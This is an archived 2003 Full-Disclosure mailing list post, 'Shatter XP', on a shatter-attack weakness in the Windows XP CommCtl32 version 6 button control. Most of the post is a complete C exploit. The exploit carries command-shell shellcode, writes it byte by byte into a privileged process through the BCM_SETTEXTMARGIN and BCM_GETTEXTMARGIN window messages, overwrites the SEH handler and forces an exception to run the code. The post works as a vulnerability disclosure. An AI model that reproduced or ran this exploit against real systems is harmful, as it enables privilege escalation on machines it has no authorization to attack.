lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <001f01c39984$863c2fd0$a0d0fea9@Oliver>
From: olavery at pivx.com (Oliver Lavery)
Subject: Shatter XP

Intro
-----

	Brett Moore from Security Assesment put me onto this one. XP's
Visual Styles, the feature that makes various controls in Windows XP look a
bit more modern, also introduce a new shatter type vulnerability into the
OS.

Vuln
-------

	Applications which have the new XPified appearance use the new
CommCtl32.dll version 6. This DLL must be explicitly specified in an
application's manifest, which is why many older applications do not benefit
from the aesthetic improvements.

	In addition to making things perty, CommCtl32.dll version 6
introduces several new messages for the windows button control:

BCM_GETIDEALSIZE 
BCM_GETIMAGELIST 
BCM_GETTEXTMARGIN 
BCM_SETIMAGELIST 
BCM_SETTEXTMARGIN 

	The two 'TEXTMARGIN' messages have a RECT * as lParam, a pattern
common to many controls which can be exploited using windows messages.
Indeed, with a little code it's possible to inject arbitrary instructions
into an application using the new XP button control.

Apps
----

	Any priviledged application which uses XP visual styles and creates
a window on the interactive desktop can be used by an attacker to gain
elevated priviledges.


Exploit
-------

	The hitch here is there's no indirect way to set a button's text
margin. Instead we make use of the fact that kernel32.dll is always at the
same address and contains known bytes. Simple.

--- CUT - HERE ---


/**********************************************************
* CommCtrl 6.0 Button Shatter attack
*
* Demonstrates the use of windows messages to;
*    - inject shellcode to known location
*    - overwrite 4 bytes of a critical memory address
*
* 4 Variables need to be set for proper execution.
*    - tWindow is the title of the programs main window
*    - SEH_HANDLER_ADDR is the critical address to overwrite
*    - SHELLCODE_ADDR is the data space to inject the code
*    - KERN32_BASE_ADDR is the base address of kernel32 on your system
*
* Oliver Lavery <olavery at pivx.com>
*
* Based on (and pretty much identical to) shatterseh2.c by 
* Brett Moore [ brett moore security-assessment com ]
**********************************************************/
#include <windows.h>
#define _WIN32_WINNT 0x501
#include <commctrl.h>
#include <stdio.h>

// Local Cmd Shellcode. 
// Added a loadLibrary call to make sure msvcrt.dll is present -- ol
BYTE exploit[] =
"\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD
1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC";

char g_classNameBuf[ 256 ];

char tWindow[]="Calculator";// The name of the main window
#define SEH_HANDLER_ADDR 0x77ed73B4      // Critical Address To Overwrite

// you might want to find a less destructive spot to stick the code, but
this works for me --ol
#define SHELLCODE_ADDR 0x77ed7484   // Known Writeable Space Or Global Space

// The range between these will be scanned to find our shellcode bytes.
#define KERN32_BASE_ADDR (BYTE *)0x77e61000 // Start of kernel32
#define KERN32_TOP_ADDR (BYTE *)0x77ed0000 // Not the actual top. Just where
we stop looking for bytes.

void doWrite(HWND hWnd, BYTE tByte, BYTE* address);
void IterateWindows(long hWnd);
void *FindByteInKernel32( BYTE byte );


void ErrorTrace(const char *msg, DWORD error)
{
	DWORD numWritten;

	WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg),
&numWritten, NULL);
	if (error) {
		LPTSTR lpMsgBuf;

		FormatMessage( 
			FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM,
			NULL,
			error,
			MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), //
Default language
			(LPTSTR) &lpMsgBuf,
			0,
			NULL 
		);
		WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf,
strlen(lpMsgBuf), &numWritten, NULL);
		// Free the buffer.
		LocalFree( lpMsgBuf );
	}
}


int main(int argc, char *argv[])
{
   long hWnd;
   HMODULE hMod;
   DWORD ProcAddr;
   printf("%% Playing with CommCtrl 6.0 messages\n");
   printf("%% Oliver Lavery.\n\n");
   printf("%% based on Shatter SEH code by\n");
   printf("%% brett moore security-assessment com\n\n");

   // Find local procedure address
   hMod = LoadLibrary("kernel32.dll");
   ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA");
   if(ProcAddr != 0)
      // And put it in our shellcode
      *(long *)&exploit[13] = ProcAddr;

   hMod = LoadLibrary("msvcrt.dll");
   ProcAddr = (DWORD)GetProcAddress(hMod, "system");
   if(ProcAddr != 0)
      // And put it in our shellcode
      *(long *)&exploit[26] = ProcAddr;

   printf("+ Finding %s Window...\n",tWindow);
   hWnd = (long)FindWindow(NULL,tWindow);
   if(hWnd == NULL)
   {
      printf("+ Couldn't Find %s Window\n",tWindow);
      return 0;
   }
   printf("+ Found Main Window At...0x%xh\n",hWnd);
   IterateWindows(hWnd);
   printf("+ Not Done...\n");
   return 0;
}

void *FindByteInKernel32( BYTE byte )
{
	BYTE *addr = KERN32_BASE_ADDR;
	while ( addr < KERN32_TOP_ADDR ) {
		if ( *addr == byte ) return addr;
	addr++;
	}
	ErrorTrace( "Couldn't find a shellcode byte in kernel32. Sorry.", 0
);
	exit(0);
}

//"Should there be any reason to believe that a relatively small group of 
//paid programmers working under the direction of a marketing machine can
produce
//code approaching the quality of a global team linked by the internet,
whose
//every line of code is subject to ruthless peer review, and whose only
standard
//is excellence?"
// - crunchie812

void doWrite(HWND hWnd, BYTE tByte, BYTE *address)
{
   void *byte_addr;
   byte_addr = FindByteInKernel32( tByte );
   SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr);
   if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) {
	   ErrorTrace( "error", GetLastError() );
   }
}

void IterateWindows(long hWnd)
{
   long childhWnd,looper;
   childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
   GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) );
   while ( strcmp(g_classNameBuf, "Button") )
   {
//      IterateWindows(childhWnd);
      childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
	  GetClassName( (HWND)childhWnd, g_classNameBuf,
sizeof(g_classNameBuf) );
   }

   if(childhWnd != NULL)
   {
      printf("+ Found button control..0x%xh\n",childhWnd);

      // Inject shellcode to known address
	  printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR);
      for (looper=0;looper<sizeof(exploit);looper++)
         doWrite((HWND)childhWnd, exploit[looper],(BYTE *)(SHELLCODE_ADDR +
looper));

      // Overwrite SEH
      printf("+ Overwriting Top SEH....0x%xh\n", SEH_HANDLER_ADDR);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR) & 0xff), (BYTE
*)SEH_HANDLER_ADDR);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 8) & 0xff), (BYTE
*)SEH_HANDLER_ADDR+1);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE
*)SEH_HANDLER_ADDR+2);
      doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE
*)SEH_HANDLER_ADDR+3);

      // Cause exception
      printf("+ Forcing Unhandled Exception\n");
      doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF);
      printf("+ Done...\n");
      exit(0);
   }
}

--- CUT - HERE ---

Greets
------

	Cheers to Brett Moore for giving me something interesting to poke
at.

	Props to the PivX crew.


~ol
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031023/61dabe8b/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ